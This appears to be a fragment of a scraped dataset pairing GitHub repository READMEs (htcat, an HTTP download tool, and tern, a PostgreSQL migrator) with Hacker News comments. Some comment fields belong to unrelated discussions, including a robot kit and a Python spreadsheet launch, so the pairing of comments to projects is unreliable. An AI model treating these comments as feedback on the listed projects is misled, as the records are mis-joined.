studied this extensively but it looks like a great bit of sample code for someone who wants to see how to do some networking in Go. I echo the other comments that find the use of a custom transport interesting, since writing a transport is one of those things that I've always been glad I haven't had to learn how to do, especially since I'm usually just using HTTP for which Go is very much batteries-included.This whole thing raises the question though, is this hard to do in other languages?This is great, I'm very new to Go and new to RPCs. I went through the code and had a question someone might be able to answer as I'm still learning Go.The Server package contains the Register function. Main package implements the QueryUser function that does the work of querying the DB. When Main calls Server.Register to register the function with Server, it sends the function name (QueryUser) and..something else? Is that the memory address of QueryUser on my computer? And when Server actually runs the function, it's just pointing to QueryUser at the memory address given to it by Main?If that's the case, am I correct in thinking that this wouldn't work as written if the Server package were running on a different physical server, because it obviously wouldn't be able to access the memory location of QueryUser on a different machine. So in this case, the Server would need to implement QueryUser itself on its hardware, but otherwise would work.Or maybe the use case of RPCs isn't for two servers communicating, but rather for two different programs on the same machine only? Or maybe what Server.Register receives is the actual function, not just the memory location (though I see no evidence of this).Can someone help enlighten me?The use of a custom transport is interesting... one of the reasons I love Go's RPC package is because it Just Works(tm) with TLS, TCP, etc etc out of the box. For anyone just showing up to this: you do not _have_ to create a custom transport.Related: Scott Mansfield of Netflix gave a talk at Gophercon 2017 on their custom serialization format if these things are interesting to you... https://github.com/gophercon/2017-talks/blob/master/ScottMan...Nice example of using \"gob\" to create RPC services. But why call it a \"framework\"?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "htcat/htcat", "link": "https://github.com/htcat/htcat", "tags": [], "stars": 548, "description": "Parallel and Pipelined HTTP GET Utility", "lang": "Go", "repo_lang": "", "readme": "# htcat #\n\n`htcat` is a utility to perform parallel, pipelined execution of a\nsingle HTTP `GET`. `htcat` is intended for the purpose of\nincantations like:\n\n htcat https://host.net/file.tar.gz | tar -zx\n\nIt is tuned (and only really useful) for faster interconnects:\n\n $ htcat http://test.com/file | pv -a > /dev/null\n [ 109MB/s]\n\nThis is on a gigabit network, between an AWS EC2 instance and S3.\nThis represents 91% use of the theoretical maximum of gigabit (119.2\nMiB/s).\n\n## Installation ##\n\nThis program depends on Go 1.1 or later. One can use `go get` to\ndownload and compile it from source:\n\n $ go get github.com/htcat/htcat/cmd/htcat\n\n## Help and Reporting Bugs ##\n\nFor correspondence of all sorts, write to .\nBugs can be filed at\n[htcat's GitHub Issues page](https://github.com/htcat/htcat/issues).\n\n## Approach ##\n\n`htcat` works by determining the size of the `Content-Length` of the\nURL passed, and then partitioning the work into a series of `GET`s\nthat use the `Range` header in the request, with the notable exception\nof the first issued `GET`, which has no `Range` header and is used to\nboth start the transfer and attempt to determine the size of the URL.\n\nUnlike most programs that do similar `Range`-based splitting, the\nrequests that are performed in parallel are limited to some bytes\nahead of the data emitted so far instead of splitting the entire byte\nstream evenly. The purpose of this is to emit those bytes as soon as\nreasonably possible, so that pipelined execution of another tool can,\ntoo, proceed in parallel.\n\nThese requests may complete slightly out of order, and are held in\nreserve until contiguous bytes can be emitted by a defragmentation\nroutine, that catenates together the complete, consecutive payloads in\nmemory for emission.\n\nTweaking the number of simultaneous transfers and the size of each\n`GET` makes a trade-off between latency to fill the output pipeline,\nmemory usage, and churn in requests and connections and incurring\ntheir associated start-up costs.\n\nIf `htcat`'s peer on the server side processes `Range` requests more\nslowly than regular `GET` without a `Range` header, then, `htcat`'s\nperformance can suffer relative to a simpler, single-stream `GET`.\n\n## Numbers ##\n\nThese are measurements falling well short of real benchmarks that are\nintended to give a rough sense of the performance improvements that\nmay be useful to you. These were taken via an AWS EC2 instance\nconnecting to S3, and there is definitely some variation in runs,\nsometimes very significant, especially at the higher speeds.\n\n|Tool | TLS | Rate |\n|-----------|-----|----------|\n|htcat | no | 109 MB/s |\n|curl | no | 36 MB/s |\n|aria2c -x5 | no | 113 MB/s |\n|htcat | yes | 59 MB/s |\n|curl | yes | 5 MB/s |\n|aria2c -x5 | yes | 17 MB/s |\n\nOn somewhat small files, the situation changes: `htcat` chooses\nsmaller parts, as to still get some parallelism.\n\nBelow are results while performing a 13MB transfer from S3 (Seattle)\nto an EC2 instance in Virginia. Notably, TLS being on or off did not\nseem to matter, perhaps in this case it was not a bottleneck.\n\n| Tool | Time |\n|--------|----------|\n| curl | 5.20s |\n| curl | 7.75s |\n| curl | 6.36s |\n| htcat | 2.69s |\n| htcat | 2.50s |\n| htcat | 3.25s |\n\nResults while performing a transfer of the same 13MB file from S3 to\nEC2, but all within Virginia:\n\n| Tool | TLS | Time |\n|------------|-----|----------|\n| curl | no | 0.29s |\n| curl | no | 0.75s |\n| curl | no | 0.44s |\n| htcat | no | 0.30s |\n| htcat | no | 0.30s |\n| htcat | no | 0.48s |\n| curl | yes | 2.69s |\n| curl | yes | 2.69s |\n| curl | yes | 2.62s |\n| htcat | yes | 1.37s |\n| htcat | yes | 0.45s |\n| htcat | yes | 0.59s |\n\nResults while performing a 4.6MB transfer on a fast (same-region)\nlink. This file is small enough that `htcat` disables multi-request\nparallelism. Given that, it's unclear why `htcat` performs markedly\nbetter on the TLS tests than `curl`.\n\n| Tool | TLS | Time |\n|------------|-----|----------|\n| curl | no | 0.14s |\n| curl | no | 0.13s |\n| curl | no | 0.14s |\n| htcat | no | 0.23s |\n| htcat | no | 0.16s |\n| htcat | no | 0.17s |\n| curl | yes | 0.95s |\n| curl | yes | 0.97s |\n| curl | yes | 0.99s |\n| htcat | yes | 0.38s |\n| htcat | yes | 0.34s |\n| htcat | yes | 0.24s |\n", "readme_type": "markdown", "hn_comments": "How can we build a machine vision robot easily? Do you share the tutorial or guideline for beginners?I think the Livera Robot kit is affordable, I will try to back one.The \"thehackernews.com\" domain is a spam site. If you have \"show dead\" enabled in your HN user profile, you can see that just about everything submitted to HN from that domain is '[dead]'.https://news.ycombinator.com/from?site=thehackernews.comAlso see cpo.st/1H5EOOx for the science behind it", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jackc/tern", "link": "https://github.com/jackc/tern", "tags": [], "stars": 548, "description": "The SQL Fan's Migrator", "lang": "Go", "repo_lang": "", "readme": "# Tern - The SQL Fan's Migrator\n\nTern is a standalone migration tool for PostgreSQL. It includes traditional migrations as well as a separate optional\nworkflow for managing database code such as functions and views.\n\n## Features\n\n* Multi-platform\n* Stand-alone binary\n* SSH tunnel support built-in\n* Data variable interpolation into migrations\n\n## Installation\n\nGo versions up to and including 1.17:\n\n go get -u github.com/jackc/tern\n\nGo versions 1.17 and higher:\n\n go install github.com/jackc/tern@latest\n\n## Creating a Tern Project\n\nTo create a new tern project in the current directory run:\n\n tern init\n\nOr to create the project somewhere else:\n\n tern init path/to/project\n\nTern projects are composed of a directory of migrations and optionally a\nconfig file. See the sample directory for an example.\n\n# Configuration\n\nDatabase connection settings can be specified via the standard PostgreSQL\nenvironment variables, via program arguments, or in a config file. By\ndefault tern will look in the current directory for the config file tern.conf\nand the migrations.\n\nThe `tern.conf` file is stored in the `ini` format with two sections,\n`database` and `data`. The `database` section contains settings for connection\nto the database server.\n\nValues in the `data` section will be available for interpolation into\nmigrations. This can help in scenarios where migrations are managing\npermissions and the user to which permissions are granted should be\nconfigurable.\n\nIf all database settings are supplied by PG* environment variables or program\narguments the config file is not required. In particular, using the `PGSERVICE`\ncan reduce or eliminate the need for a configuration file.\n\nThe entire `tern.conf` file is processed through the Go standard\n`text/template` package. [Sprig](http://masterminds.github.io/sprig/) functions\nare available.\n\nExample `tern.conf`:\n\n```ini\n[database]\n# host supports TCP addresses and Unix domain sockets\n# host = /private/tmp\nhost = 127.0.0.1\n# port = 5432\ndatabase = tern_test\nuser = jack\npassword = {{env \"MIGRATOR_PASSWORD\"}}\n# version_table = public.schema_version\n#\n# sslmode generally matches the behavior described in:\n# http://www.postgresql.org/docs/9.4/static/libpq-ssl.html#LIBPQ-SSL-PROTECTION\n#\n# There are only two modes that most users should use:\n# prefer - on trusted networks where security is not required\n# verify-full - require SSL connection\n# sslmode = prefer\n#\n# \"conn_string\" accepts two formats; URI or DSN as described in:\n# https://www.postgresql.org/docs/current/libpq-connect.html#LIBPQ-CONNSTRING\n#\n# This property is lenient i.e., it does not throw error\n# if values for both \"conn_string\" and \"host/port/..\" are\n# provided. In this case, the individual properties will\n# override the correspoding part in the \"conn_string\".\n#\n# URI format:\n# conn_string = postgresql://other@localhost/otherdb?connect_timeout=10&application_name=myapp\n# DSN format:\n# conn_string = host=localhost port=5432 dbname=mydb connect_timeout=10\n\n# Proxy the above database connection via SSH\n# [ssh-tunnel]\n# host =\n# port = 22\n# user defaults to OS user\n# user =\n# password is not required if using SSH agent authentication\n# password =\n\n[data]\nprefix = foo\napp_user = joe\n\n```\n\nThis flexibility configuration style allows handling multiple environments such\nas test, development, and production in several ways.\n\n* Separate config file for each environment\n* Environment variables for database settings and optionally one config file\n for shared settings\n* Program arguments for database settings and optionally one config file for\n shared settings\n\n## Migrations\n\nTo create a new migration:\n\n tern new name_of_migration\n\nThis will create a migration file with the given name prefixed by the next available sequence number (e.g. 001, 002, 003).\n\nThe migrations themselves have an extremely simple file format. They are\nsimply the up and down SQL statements divided by a magic comment.\n\n ---- create above / drop below ----\n\nExample:\n\n```sql\ncreate table t1(\n id serial primary key\n);\n\n---- create above / drop below ----\n\ndrop table t1;\n```\n\nIf a migration is irreversible such as a drop table, simply delete the magic\ncomment.\n\n```sql\ndrop table widgets;\n```\n\nTo interpolate a custom data value from the config file prefix the name with a\ndot and surround the whole with double curly braces.\n\n```sql\ncreate table {{.prefix}}config(\n id serial primary key\n);\n```\n\nMigrations are read from files in the migration directory in the order of the\nnumerical prefix. Each migration is run in a transaction.\n\nAny SQL files in subdirectories of the migration directory, will be available\nfor inclusion with the template command. This can be especially useful for\ndefinitions of views and functions that may have to be dropped and recreated\nwhen the underlying table(s) change.\n\n```sql\n// Include the file shared/v1_001.sql. Note the trailing dot.\n// It is necessary if the shared file needs access to custom data values.\n{{ template \"shared/v1_001.sql\" . }}\n);\n```\n\nTern uses the standard Go\n[text/template](http://golang.org/pkg/text/template/) package so conditionals\nand other advanced templating features are available if needed. See the\npackage docs for details. [Sprig](http://masterminds.github.io/sprig/)\nfunctions are also available.\n\n## Migrating\n\nTo migrate up to the last version using migrations and config file located in\nthe same directory simply run tern:\n\n tern migrate\n\nTo migrate up or down to a specific version:\n\n tern migrate --destination 42\n\nTo migrate up N versions:\n\n tern migrate --destination +3\n\nTo migrate down N versions:\n\n tern migrate --destination -3\n\nTo migrate down and rerun the previous N versions:\n\n tern migrate --destination -+3\n\nTo use a different config file:\n\n tern migrate --config path/to/tern.json\n\nTo use a different migrations directory:\n\n tern migrate --migrations path/to/migrations\n\n## Renumbering Conflicting Migrations\n\nWhen migrations are created on multiple branches the migrations need to be renumbered when the branches are merged. The\n`tern renumber` command can automatically do this. On the branch with the only migrations to keep at the lower numbers\nrun `tern renumber start`. Merge the branches. Then run `tern renumber finish`.\n\n```\n$ git switch master\nSwitched to branch 'master'\n$ ls\n001_create_users.sql\n002_add_last_login_to_users.sql\n\n$ git switch feature\nSwitched to branch 'feature'\n$ ls\n001_create_users.sql\n002_create_todos.sql\n\n# Both branches have a migration number 2.\n\n# Run tern renumber start on the branch with the migrations that should come first.\n\n$ git switch master\nSwitched to branch 'master'\n$ tern renumber start\n\n# Then go to the branch with migrations that should come later and merge or rebase.\n\n$ git switch feature\n$ git rebase master\nSuccessfully rebased and updated refs/heads/feature.\n$ ls\n001_create_users.sql\n002_add_last_login_to_users.sql\n002_create_todos.sql\n\n# There are now two migrations with the same migration number.\n\n$ tern renumber finish\n$ ls\n001_create_users.sql\n002_add_last_login_to_users.sql\n003_create_todos.sql\n\n# The migrations are now renumbered in the correct order.\n```\n\n## Code Packages\n\nThe migration paradigm works well for creating and altering tables, but it can be unwieldy when dealing with database\ncode such as server side functions and views. For example, consider a schema where view `c` depends on view `b` which\ndepends on view `a`. A change to `a` may require the following steps:\n\n1. Drop `c`\n2. Drop `b`\n3. Drop `a`\n4. Create `a`\n5. Create `b`\n6. Create `c`\n\nIn addition to the challenge of manually building such a migration it is difficult to use version control to see the\nchanges in a particular database object over time when its definition is scattered through multiple migrations.\n\nA solution to this is code packages. A code package is a directory with an `install.sql` file that contains the\ninstructions to completely drop and recreate a set of database code. The command `code install` can be used to directly\ninstall a code package (especially useful during development) and the `code snapshot` command can be used to make a\nsingle migration that installs that code package.\n\nFor example given a directory `code` containing the following files:\n\n```\n-- install.sql\ndrop schema if exists code cascade;\ncreate schema code;\n\n{{ template \"a.sql\" . }}\n{{ template \"b.sql\" . }}\n{{ template \"c.sql\" . }}\n```\n\n```\n-- a.sql\ncreate view code.a as select ...;\n```\n\n```\n-- b.sql\ncreate view code.b as select * from code.a where ...;\n```\n\n```\n-- c.sql\ncreate view code.c as select * from code.b where ...;\n```\n\nThen this command would install the package into the database.\n\n```\ntern code install path/to/code --config path/to/tern.conf\n```\n\nAnd this command would create a migration from the current state of the code package.\n\n```\ntern code snapshot path/to/code --migrations path/to/migrations\n```\n\nCode packages have access to data variables defined in your configuration file as well as functions provided by\n[Sprig](http://masterminds.github.io/sprig/).\n\nIt is recommended but not required for each code package to be installed into its own PostgreSQL schema. This schema\ncould be determined by environment variable as part of a blue / green deployment process.\n\n## Template Tips\n\nThe `env` function can be used to read process environment variables.\n\n```\ndrop schema if exists {{ env \"CODE_SCHEMA\" }} cascade;\ncreate schema {{ env \"CODE_SCHEMA\" }};\n```\n\nThe [Sprig dictionary functions](http://masterminds.github.io/sprig/dicts.html) can be useful to call templates with extra parameters merged into the `.` value.\n\n```\n{{ template \"_view_partial.sql\" (merge (dict \"view_name\" \"some_name\" \"where_clause\" \"some_extra_condition=true\") . ) }}\n```\n\n## SSH Tunnel\n\nTern includes SSH tunnel support. Simply supply the SSH host, and optionally\nport, user, and password in the config file or as program arguments and Tern\nwill tunnel the database connection through that server. When using a SSH tunnel\nthe database host should be from the context of the SSH server. For example, if\nyour PostgreSQL server is `pg.example.com`, but you only have SSH access, then\nyour SSH host would be pg.example.com and your database host would be\n`localhost`.\n\nTern will automatically use an SSH agent or `~/.ssh/id_rsa` if available.\n\n## Embedding Tern\n\nAll the actual functionality of tern is in the github.com/jackc/tern/migrate\nlibrary. If you need to embed migrations into your own application this\nlibrary can help.\n\n## Running the Tests\n\nTo run the tests tern requires two test databases to run migrations against.\n\n1. Create a new database for main tern program tests.\n2. Open testdata/tern.conf.example\n3. Enter the connection information.\n4. Save as testdata/tern.conf.\n5. Create another database for the migrate library tests.\n6. Run tests with the connection string for the migrate library tests in the MIGRATE_TEST_CONN_STRING environment variable\n\n MIGRATE_TEST_CONN_STRING=\"host=/private/tmp database=tern_migrate_test\" go test ./...\n\n## Prior Ruby Gem Version\n\nThe projects using the prior version of tern that was distributed as a Ruby\nGem are incompatible with the version 1 release. However, that version of tern\nis still available through RubyGems and the source code is on the ruby branch.\n\n## Version History\n\n## 1.13.0 (April 21, 2022)\n\n* Add conn string connection config option (vivek-shrikhande)\n* Add Filename to MigrationPgError (davidmdm)\n\n## 1.12.5 (June 12, 2021)\n\n* Look for SSH keys in `~/.ssh/id_rsa` (Miles Delahunty)\n\n## 1.12.4 (February 27, 2021)\n\n* Use user's known_hosts file when connecting via SSH\n\n## 1.12.3 (December 24, 2020)\n\n* Fix reported version number\n\n## 1.12.2 (December 23, 2020)\n\n* Fix setting port from config file\n* Fix non-schema qualified version table not in public but in search path (Tynor Fujimoto)\n\n## 1.12.1 (June 27, 2020)\n\n* Update to latest version of pgx.\n\n## 1.12.0 (June 26, 2020)\n\n* Command code install no longer outputs compiled SQL.\n* Add code compile command to print compiled SQL code package.\n* Better error reporting for code install.\n\n## 1.11.0 (April 10, 2020)\n\n* Add [Sprig](http://masterminds.github.io/sprig/) functions to configuration file and migrations.\n* Add SQL code management distinct from migrations.\n\n## 1.10.2 (March 28, 2020)\n\n* CLI now handles SIGINT (ctrl+c) and attempts to cancel in-progress migration before quitting\n\n## 1.10.1 (March 24, 2020)\n\n* Fix default CLI version-table argument overriding config value\n\n## 1.10.0 (March 7, 2020)\n\n* Better locking to protect against multiple concurrent migrators on first run\n* Update pgx version to support PostgreSQL service files\n\n## 1.9.1 (February 1, 2020)\n\n* Look for version table in all schemas in search_path instead of just the top schema\n\n## 1.9.0 (February 1, 2020)\n\n* Default version table is explicitly in public schema\n* Update to pgx v4 (Alex Gaynor)\n\n## 1.8.2 (July 19, 2019)\n\n* Show PostgreSQL error details\n* Rename internal error type\n\n## 1.8.1 (April 5, 2019)\n\n* Issue `reset all` after every migration\n* Use go modules instead of Godep / vendoring\n\n## 1.8.0 (February 26, 2018)\n\n* Update to latest version of pgx (PostgreSQL driver)\n* Support PGSSLROOTCERT\n* Fix typos and internal cleanup\n* Refactor internals for easier embedding (hsyed)\n\n## 1.7.1 (January 30, 2016)\n\n* Simplify SSH tunnel code so it does not listen on localhost\n\n## 1.7.0 (January 17, 2016)\n\n* Add SSH tunnel support\n\n## 1.6.1 (January 16, 2016)\n\n* Fix version output\n* Evaluate config files through text/template with ENV\n\n## 1.6.0 (January 15, 2016)\n\n* Optionally read database connection settings from environment\n* Accept database connection settings via program arguments\n* Make config file optional\n\n## 1.5.0 (October 1, 2015)\n\n* Add status command\n* Add relative migration destinations\n* Add redo migration destinations\n\n## 1.4.0 (May 15, 2015)\n\n* Add TLS support\n\n## 1.3.3 (May 1, 2015)\n\n* Fix version output\n\n## 1.3.2 (May 1, 2015)\n\n* Better error messages\n\n## 1.3.1 (December 24, 2014)\n\n* Fix custom version table name\n\n## 1.3.0 (December 23, 2014)\n\n* Prefer host config whether connecting with unix domain socket or TCP\n\n## 1.2.2 (May 30, 2014)\n\n* Fix new migration short name\n\n## 1.2.1 (May 18, 2014)\n\n* Support socket directory as well as socket file\n\n## 1.2.0 (May 6, 2014)\n\n* Move to subcommand interface\n* Require migrations to begin with ascending, gapless numbers\n* Fix: migrations directory can contain other files\n* Fix: gracefully handle invalid current version\n* Fix: gracefully handle migrations with duplicate sequence number\n\n## 1.1.1 (April 22, 2014)\n\n* Do not require user -- default to OS user\n\n## 1.1.0 (April 22, 2014)\n\n* Add sub-template support\n* Switch to ini for config files\n* Add custom data merging\n\n## 1.0.0 (April 19, 2014)\n\n* Total rewrite in Go\n\n## 0.7.1\n\n* Print friendly error message when database error occurs instead of stack trace.\n\n## 0.7.0\n\n* Added ERB processing to SQL files\n\n## License\n\nCopyright (c) 2011-2014 Jack Christensen, released under the MIT license\n", "readme_type": "markdown", "hn_comments": "I've seen a bunch of companies do this. The problem is always that it isn't Excel. This means usually things like XLWings, Excel-DNA, etc. are actually more useful.Traditionally the business is the source of spreadsheets (data comes from the biz side of the equation). The data analyst then has to make sense of the data.So to convince a BA to input their data on Neptyne because the DA might need to python script it at some point is maybe premature optimization.That's an uphill battle... But I definitely see it a good case for me personally as someone who both originates data (nothing fancy) and needs to process it further...Will definitely check it out!Wow this is cool! I created a similar thing over the summer but never took it anywhere because I felt GSheets would just add Python.https://github.com/ricklamers/gridstudioRooting for you guysI had three minutes, clicked tutorial and got a modal asking me to sign up.Left the page.Wow this is so cool!I'm trying the app tutorial out and some of the calculations (e.g. the sum() step) is taking maybe 30-60 seconds to complete \u2014 is that usual, or are you getting hugged by HN?I think https://www.visidata.org/ also supports pythonLooks cool! Since you mentioned all the magic happening in the backend, how does it run? How do you ensure I am not running malicious Python code, like infinite for loop or never-ending recursion? Also, disabling file or network IO?Did you also explore running Python in the browser using wasm?Please noThis is neat. Congrats on the launch. Having a python repl next to spread sheet will be handy for a lot of user cases.I don't know what to make of the fact that reactivity doesn't seem to be discussed in the docs or the tutorial. I am a fan of ObservableHQ's reactive JavaScript notebooks, in which blocks of code get rerun when their inputs change. This is reactivity in the same sense as spreadsheets are reactive, and it's pretty neat. One nice feature of ObservableHQ is that you can use free variables when writing code blocks, and they will get their values (reactively) from the environment. That is very powerful and it seems to me that plugging a scripting language into a spreadsheet should work that way as well.Interesting! Congrats on the launch.I tried it out, and just first feedback:- I often use the \"Home\" and \"End\" key to go the start/end of the line when I'm editing a cell. It scrolls to start/end of the whole spreadsheet, however. Since I'm not a spreadsheet user, I'm not sure if that's expected.- The handlers like \"on_dropdown_change\" should receive an argument for the cell it's coming from, so you can e.g. change the cell that's next to it. Or how else is this supposed to be done?It's quite cool :-) I suppose one problem could be integration with existing Google Sheets / Excel sheets?Good job! i really like the idea and also the implementatino is really good for something totaly new!\nBut as much as i would love to see this as the new MS excel i can't immagine this replacing it.\nI wish you good luck and i hope more ppl will start using this instead of MS exceldoes this neptyne also work off-cloud?\ne.g. now way that i'll upload my data into the void.How is this different from other solutions such as this one: https://equals.app?Congrats ! Looks really cool !I always had this rule of thumb, \"the better a programmer is at spreadsheets, the worse programmer he is\" :D Mostly cause I suck so much at spreadsheets. I always think to myself, dammit I'm a career programmer how come I can't do a double-column lookup across two sheets with my eyes closed :(Anywhoo congrats again, now can we make it work with something nice like Clojure or Lisp :P ?Pricing info? Maybe I'm missing it but I don't see it on the site.How do you manage version control and testing? I can't see anything in the docs about that.Lack of review/tests etc is the main reason IMO that spreadsheets can be very dangerous tools. The more they become production applications the greater the impacts are.Questions:This is a platform as a service?How does the frontend work with the backend, it\u2019s all backend and magic stuff to reflect it on the frontend?Looks cool, but the get started --> skip signup to try now --> empty tyne flow is broken. When I click \"empty tyne\", it just reloads the page and blocks you with \"empty tyne\" again and again.Also, I'm curious if it supports live collaborative editing like google sheets/docs/etc do?This sounds like a really good idea - combining spreadsheet convenience with being able to do programmatic manipulations with python can be really value for people who are using spreadsheets to do modeling (e.g financial). I think (especially based on some other comments) a big challenge will be just getting people out of their current bubble. If you do financial modeling, you might be entrenched in excel, and if you so data science in python, you might never dream of using spreadsheets.My unsolicited advice (that's probably on your radar anyway) would be to try and get a management consulting firm on board with this. The flexibility this has would be well used there, and you've got lots of people who are engineers stuck using spreadsheets that would be on board with trying something like this.How does it interact with libraries that need the file system? e.g. Can I use requests-cache?Very Excited.I'm likely very close to the ideal user. I don't program for work but make CSV-consuming tools from Python here and there to work on giant exports of data when they get outside of Excel's built-in magic.Most recently the exact task was to consume a Zoom user export, filter with RegEx, and transform the table for upload to Zoom as a CSV again, but with different fields. This would translate very well to Neptyne if it supported 70k rows.Very cool but what's to stop Microsoft from doing this in Excel and making it instantly integrated into the software that millions of us already use?I believe Google Sheets supports programmability using Javascript these days. Is your product fundamentally different?\nThanks and all the best.This is really cool and promising product! So many times when I was getting a google docs spreadsheet from non-engineering folks I was wondering if only I can embed a small jupyter notebook with a few python cells and a nice looking pandas chart, using this data.. Congrats on the launch!Just some feedback: the landing page dimensions are all out of order. There's a horizontal scrollbar under the \"sneak peak\" section. Never a good thing. The spacing between the heading and the hero image is far too wide.Why do you require a login for the tutorial? I backed out because of it.The concept of Python-based spreadsheets was explored by Resolver One[1], a defunct proprietary desktop app that was discontinued ~10 years ago[2].It seems a web version of the app has been published in open-source[3] but that too has been EOL.[1] https://web.archive.org/web/20120211201410/http://www.resolv...\n[2] https://www.resolversystems.com\n[3] https://github.com/pythonanywhere/dirigible-spreadsheetThis is impressive. It seems like you really understand the requirements of the audience that uses spreadsheets AND data centric Python! The REPL, in particular, is a nice touch.My biggest concern with a tool like this is that the power-iest power users who would love it tend to work at big enterprises where they're locked into productivity suite bundles with Microsoft or Google. Additionally, if you get traction, Google and Microsoft would be very likely to clone your features for Sheets and Excel.Good opportunity to highlight Google \"Apps Script\" which is one of the most powerful but unknown tools in the web:\nhttps://developers.google.com/apps-script/guides/sheetsIncludes easy fetching:\nhttps://developers.google.com/apps-script/reference/url-fetc...I suppose python could be better for this use case but javascript seems to work fine. And it's all built righ in to Google Sheets.Very cool! Does it allow real-time multi-person editing? (It's not very clear from the landing page.)If so - how do you handle multiple people editing the code area at the same time?Would be a killer feature if this was robust!Forced signup to even test it? Hard passThis is cool, but I think it might be missing what the big problems with spreadsheets are.I was complaining just today because I pasted some records into Excel and it decided to treat 933349234275230104 as a number (it's a hash), convert it to scientific notation (which I NEVER want), and lose precision. Yet there is no way to globally disable scientific notation. Plus it's kind of insane that \"formatting\" changes data in the first place.I frequently paste timestamps into Sheets or Excel and it just ruins everything. If split-to-text puts the date part in one column and the time part in another, I can't put them back together with a simple string concatenation, because again \"formatting\" turned my date text into Excel's weird internal number. This is legacy behavior that Excel has to keep for backward compatibility, but I don't want it, and I wish I could turn it off.Sometimes I'll try to scatter-plot 5 series against a timestamp, and Excel will decide all 6 columns are series, even though a scatter plot with no X-axis makes zero sense. Even when it does work, Excel seems stubbornly uninterested in understanding how dates/times work, and I can't do simple things like tell it to have an X-axis tick every day/week/month.If you are building a spreadsheet in 2023, the #1 goal should be leaving behind all the baggage, even if it has to be behind a toggle. Listen to what people find frustrating about Excel (tip: it's gonna be dates) and fix that.If you can do that, then yeah, Python! Woo! Neat! But that's not going to be the main draw, because it's not a solution to the main problems that spreadsheets have.I like this idea. If I\u2019m doing anything more than a trivial formula in Excel or Google Sheets then it\u2019s a pain to look up the proper syntax. Just being able to use Python sounds great.> You mix Excel style cell addresses (A1, C3) and ranges (B2:B20)Well, that's unfortunate for \"power\" users - I'd imagine they'd want what excel calls r1c1 mode:https://learn.microsoft.com/en-us/office/troubleshoot/excel/...One of the many valuable lessons from Joel Spolsky \"You suck at Excel\" (around 8:30 mark):\nhttps://youtu.be/0nbkaYsR94cThis would be actually useful if it were offline and didn't require a login.Looking for something like this exactly. Is it possible to install on site? No way my company would want prop data on a cloud.This looks fantastic, and sadly completely misses the mark on a huge industry that uses excel every day: investment management, hedge funds, etc. Why? Because this is yet another cloud only solution with no self hosting possibility.These firms are very-very rich and would pay good money, but a very small %-age will be willing to give you their data. It doesn't matter how many certifications you quote about data treatment, we will simply not trust you with our data, full stop.You say pyxll is a mediocre tool, but IMO they understand how this industry works.Really sad, because the tool itself looks fantastic...Congrats on the launch! I'm the cofounder of Mito[1], an open-core spreadsheet extension to Jupyter that generates the equivalent Python code every time you edit your data. We also think that combining the intuitiveness of spreadsheet UI with the repeatability and large-data-handling-abilities of Python is going to unlock a bunch of Excel-first analysts to save themselves tons of time by automating repetitive reports.One difference in our approach is that the Mito spreadsheet goes from Spreadsheet -> Python code, instead of the other way. For every edit you make in the Mito spreadsheet, we generate the equivalent Python code for you.In practice, this has been really important for us for few reasons:1) A lot of our users are early in their Python journey. They might've taken a Udemy course or done some Kaggle classes, but generally they are not yet comfortable writing a Python script from scratch. Since they already have a ton of work on their plates, if the option is do the report manually in Excel for 2 hours today or spend the next 2 days writing a Python script to automate their work and save them those 2 hours a day each month going forward, they will probably choose to do it manually. By giving them the Python code for the edits that they make, its more like build the report for 2 hours today in Mito and get the Python script automatically so you don't ever have to build the report again.2) There are 1 million and 10 things that users want to do in a report, so by giving the user the equivalent Python code, they're able to use the code they've generated as a starting point, not the finish line. For example [2], one really common use case we've seen is Excel workbooks with the following tabs: input_data, Jan 2020, Feb 2020, \u2026, Dec 2022, \u2026. In each case, the month tab corresponds to the same sort of filtering and transformations of the input data. These users get a huge amount of value out of actually having access to the Python code that they generated. The user will use the Mito spreadsheet to generate tab Jan 2020, turn the Mito generated code into a function, and then apply the function to generate Feb 2020 ... December 2022.[1] https://www.trymito.io\n[2] https://blog.trymito.io/automating-spreadsheets-with-python-...\"Supercharge your spreadsheets with Python and AI\"lol, threw in the AI there just in caseor just use pivot table.> Drag the corner from F7 to F9 to compute the total cost for each unit.I do that.> Server connection error: failed to connect to serverI get that the system is overloaded, but if every small action requires a network, and I can't use it with intermittent network let alone offline, I'm not too thrilled.This seems like an amazing idea probably because I know python pretty well... People who can't use python probably won't be into it.Very cool idea. Since it is based on Jupyter Notebook, can I self host this for my needs?Congratulations on the launch! I'm very excited to try replacing my hacked-together AppScript with this.wasn't there some rumours about excel adding python support? what happened to that?Is there an api or cli interface so I don't have to use the web ide?I know python, don't really know VBA. This will open up a new world for me. Excited to try it out.I yet to understand a reason for cell to be addressed by A1 or C1R1 style. put it in a table, give a column a name. Numbers got it right.Cool idea but not ready for primetime. The very first thing in the demo didn't work: couldn't drag the cell and couldn't use command+C to copy the data.On the surface this seems like an impossible market to penetrate. But you must know this. What is the deeper insight that one who thinks this is missing?LibreOffice Calc combined with python's pandas and numpy modules meet all needs I have for spreadsheets, with matplotlib and seaborn for visualization. The Ipython shell is the optimal IDE for this approach IMO. My desktop reference is:\"Python for Data Analysis 2nd ed\" (Wes McKinney, 2018)I remembered Alphasheets was acquired by Google a couple of years ago for doing similar thing (they programmed in Haskell which is really cool) https://medium.com/bloated-mvp/alphasheets-mvp-review-ec328e...Very cool! I constantly struggle trying to do things in spreadsheets that are easy in Python. But I/O makes it annoying to write one-off scripts for a 30 second op. This would solve that pain point!I would love a Google Sheets integration, since that's where I already live with most of my CSV/Sheets data + it would seamlessly fit into my workflow. If this was a Chrome extension I would have installed it today.As is, I don't see myself using another spreadsheet app.What's are the costs? Couldn't find it on the site.I can't understand how this will improve the work. I see the value of having python instead of sheets formulas for python developers, but developers would work on totally different toolsets (like Jupyter notebook, as you mentioned), or something like StreamIt or https://gradio.app/This would be useless for spreadsheet users (those who use sheet formulas) as they have to learn python.I'm not in the target audience, so I might be completely wrong about the use cases.Congrats on the launch. Building a product of this complexity is no easy feat! Out of curiosity: given the old adage that a product needs to be 10x to overcome switching costs, how do you prove users that you are 10x better than Google Sheets or Excel?This is really cool. There was another recent post about something similar: https://news.ycombinator.com/item?id=34805132One question/thought: what's your security like? Inevitably, people treat spreadsheets like databases for better or worse. That means they often contain lots of things that might be better stored elsewhere - sometimes PII, sometimes a proprietary formula, set of factors as inputs to a process, etc.So, I think many spreadsheet-heavy businesses will avoid something that doesn't obviously sit inside the fortress of security they've approved. Of course, someone can just accidentally email a spreadsheet to the wrong person or store it somewhere with no security. It happens all the time, I'm under no 